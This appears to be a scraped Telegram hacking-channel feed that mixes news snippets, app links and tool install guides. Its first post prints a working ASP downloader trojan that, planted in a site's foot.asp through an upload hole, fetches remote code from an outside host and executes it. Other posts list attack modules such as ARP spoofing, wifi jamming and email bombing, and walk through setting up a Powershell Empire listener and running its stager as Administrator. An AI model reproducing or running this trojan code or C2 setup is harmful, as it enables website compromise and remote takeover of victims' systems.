UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.8K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘METHODE FOR INJECT TROJAN :
This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:


<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>



@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘New Deep websites : 7/24 & 23/24 online :

http://j7hackfestgaeuvv.onion/ – Hackfest 2017 | Conferences and CTF, November 3-4th | Trainings, October 31st-November 1-2nd | Largest hacking event in Canada | Quebec City, Canadaβœ…

http://4sf3dqfwpcpdnj6g.onion/ – FHT – Free Hacking Toolsβœ…

http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and BeyondπŸ”„


http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramaticaβœ…

http://ih4pgsz3aepacbwl.onion/ – Hushboxβœ…

http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul

http://tns7i5gucaaussz4.onion/ – FreeForβœ…
RDP HACKING METHODE :))
Forwarded from UNDERCODE NEWS
TSMC demonstrates the powerful 5nm chip, this year iPhone 12 used
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACKING TOOL :
#gitTopic
TERMUX(root)-LINU-WINDOWS:

apache
_users
arp_dos
arp_monitor
arp_spoof
bluetooth_pod
cloudflare_resolver
dhcp_dos
dir_scanner
dns_spoof
email_bomber
hostname_resolver
mac_spoof
mitm
network_kill
pma_scanner
port_scanner
proxy_scout
whois
web_killer
web_scout
wifi_jammer
zip_cracker
rar_cracker
wordlist_gen

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/4shadoww/hakkuframework.git

2) cd hakkuframework

3) sudo ./install -i

4) choose option

that's all

Verified βœ…
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘INSTAGRAM REAL FOLLOWER APPS IOS/ANDROID :
#Updated list :

https://itunes.apple.com/us/app/priime/id934587545?mt=8

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://pixlr.com/

https://itunes.apple.com/us/app/litely/id850707754?mt=8

https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8

https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8

https://itunes.apple.com/us/app/social-rocket-for-instagram-get-followers-report/id1210349595?mt=8

https://itunes.apple.com/us/app/social-rocket-for-instagram-get-followers-report/id1210349595?mt=8

https://www.crowdfireapp.com/

https://itunes.apple.com/us/app/crowdfire/id528626975?mt=8

https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8

https://itunes.apple.com/us/app/tracker-for-instagram/id1246192822?mt=8

https://itunes.apple.com/us/app/followers-likes-on-instagram/id862228531?mt=8

https://itunes.apple.com/us/app/followers-likes-on-instagram/id862228531?mt=8

https://play.google.com/store/apps/details?id=ru.wyeg.instatag&hl=en

https://play.google.com/store/apps/details?id=ru.wyeg.instatag&hl=en

https://play.google.com/store/apps/details?id=socials.com.application&hl=en

https://play.google.com/store/apps/details?id=socials.com.application&hl=en

https://play.google.com/store/apps/details?id=socials.com.application&hl=en
https://itunes.apple.com/us/app/magic-liker-for-like-tags/id1218151216?mt=8

https://www.topappslike.com/magic-liker-for-instagram-likes/https://hootsuite.com/instagram

https://pro.iconosquare.com/

https://itunes.apple.com/us/app/iconosquare/id1150428618?mt=8

https://unionmetrics.com/free-tools/instagram-
account-checkup-gen/

https://unionmetrics.com/free-tools/instagram-account-checkup-gen/

https://squarelovin.com/business/home/

https://squarelovin.com/business/home/instagram-insights/

βœ…2020
enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Ants group earn a net income of 12448.74 million dollar/1 day in 2020
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘how can we protect the security of shared folders in the local area network? This requires the following means:

> Method 1: Record the shared file access log and check who is accessing my shared file in real time.

γ€€γ€€
Sometimes, I shared a file on a Windows XP computer. Perhaps, for some reason, we need to know who is accessing this file now. For example, when we turn off the computer, the system will prompt how many users are connected to this shared folder. We need to know who the users are and how should this be achieved? In fact, this is relatively simple, we can use the built-in functions of the operating system to achieve. You can follow the steps below.

γ€€γ€€
> Step 1: Open the control panel, management tools, computer management (local), system tools, and then select the shared folder. In this window, there is a "session" option. Double-click to open this option. In the window on the right, it will show which computers are accessing your computer. However, in this window, you can only see which computers are connected to your computer, and you don't know which shared files they are accessing.

> Step 2: Select "System Tools", Shared Folder, and Open File in turn. At this time, some shared resources on this computer and which computers are accessing them will be displayed in the window. At the same time, some useful information will be displayed in this window, such as which shared file was opened; when did it start to access; and how much time has been idle.
γ€€γ€€
In addition, we may sometimes for certain purposes, such as employees may think that this person cannot access this file. At this point, we can right-click the session directly, and then select close session from the shortcut menu, we can prevent this user from accessing the shared file without affecting the normal access of other users.

> This feature is sometimes very useful. As we all know, the system has a maximum number of connections. Sometimes employees will reflect, why can't I ask your shared files. We saw that it turned out that the number of connections reached the upper limit. At this point, we can query how many users are currently connected to my computer in this way, and then we can disconnect some users who do not need access and allow users who need access to connect.

Verified βœ…
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
There is a speculation that TikTok has invited Netflix to negotiate on the sale of TikTok's US company #international
Process Memory and Memory Corruptions.pdf
1.1 MB
The prerequisite for this part of the tutorial is a basic understanding of ARM assembly (covered in the rst tutorial series β€œARM Assembly Basicsβ€œ). In this chapter you will get an introduction into the memory layout of a process in a 32-bit Linux environment. After that you will learn the fundamentals of Stack and Heap related memory corruptions and how they look like in a debugger
#exploitation
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ALL NEW TERMUX PACKAGES :

x11-repo Termux repo for x11 packages pkg
install x11-repo

vnc server For graphical output pkg install tigervnc

openbox wm Openbox Window Manager pkg

install openbox obconf

xsetroot Set color background for X pkg install xorg-xsetroot


xterm X terminal pkg install xterm

xcompmgr Composite manager or desktop effects pkg install xcompmgr

xfsettingsd The settings daemon, to set themes & icons pkg install xfce4-settings

polybar Easy and fast status bar pkg install polybar libnl

st Suckless/Simple terminal pkg install st

geany Graphical text editor pkg install geany

thunar File manager (optional) pkg install thunar

pcmanfm File manager pkg install pcmanfm

rofi An application launcher pkg install rofi

feh Simple image viewer pkg install feh

neofetch System info program pkg install neofetch

git VCS, for cloning repos pkg install git

wget Command line downloader pkg
install wget

curl To transfer/get internet data pkg install curl

zsh A very good shell pkg install zsh

vim Command line text editor (! - hard to exit :D) pkg install vim

htop System monitor (optional) pkg install htop

elinks Command line web browser (optional) pkg install elinks

mutt Command line mail client (optional) pkg install mutt

mc Command line file manager (optional) pkg install mc

ranger Command line file manager (optional) pkg install ranger

cmus Command line music player (optional) pkg install cmus

cava Console-based audio visualizer (optional) pkg install cava

pulseaudio Sound system & audio server (optional) pkg install pulseaudio

Verified βœ…
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Install/Setup Powershell Empire on Kali Linux


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :


1) Spin up a Kali Linux

2) cd /opt

3) git clone https://github.com/EmpireProject/Empire.git

4) cd Empire

5) ./setup/install.sh

A. Hit enter to set a random server password

6) ./empire Setup/Configure HTTP listener

1. listeners

2. uselistener http A. set Name http80 B. set Host http://<IP addr of Kali Linux>:80

C. execute

D. back Create Powershell stager

7) usestager multi/launcher http80 2. execute

8) Copy Powershell output string Detonate Powershell stager

1. Spin up a Windows 10 VM and login

2. Open a Powershell prompt as Administrator

3. Copy Powershell output string and hit enter

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘updated 2020 HACKING TOOL (TERMUX/LINUX)

DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early . This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.

πŸ¦‘F E A T U R E S :

-Check all NS Records for Zone Transfers.

-Enumerate General DNS Records for a given

-Domain (MX, SOA, NS, A, AAAA, SPF and TXT).

-Perform common SRV Record Enumeration.

-Top Level Domain (TLD) Expansion.

-Check for Wildcard Resolution.

-Brute Force subdomain and host A and AAAA

-records given a domain and a wordlist.

-Perform a PTR Record lookup for a given IP Range or CIDR.

-Check a DNS Server Cached records for A, AAAA and

-CNAME Records provided a list of host records in a text file to check.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣ Ubuntu / Debian / Backtrack
Installation instructions for Ubuntu 10.10 they should work with little to no modification on previous versions. Install needed packages, for Backtrack you only need to install git-core:

1) $ sudo apt-get install libavahi-compat-libdnssd1 git-core

2) $ sudo apt-get install python-setuptools
Once those packages are installed we will install the supporting libraries for python to be able to run the script:

3) $ sudo easyinstall netaddr

4) $ sudo easy
install dnspython

5) Navigate to the folder you want to install the DNSRecon script and run the following command to download the script and files:

$ git clone git://github.com/darkoperator/dnsrecon.git

6) To keep the script and associated files updated just navigate into the dnsrecon folder and run:

$ git pull

FOR CENTOS : https://github.com/darkoperator/dnsrecon/wiki/Installation-Instructions


βœ…git topic 2020
enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁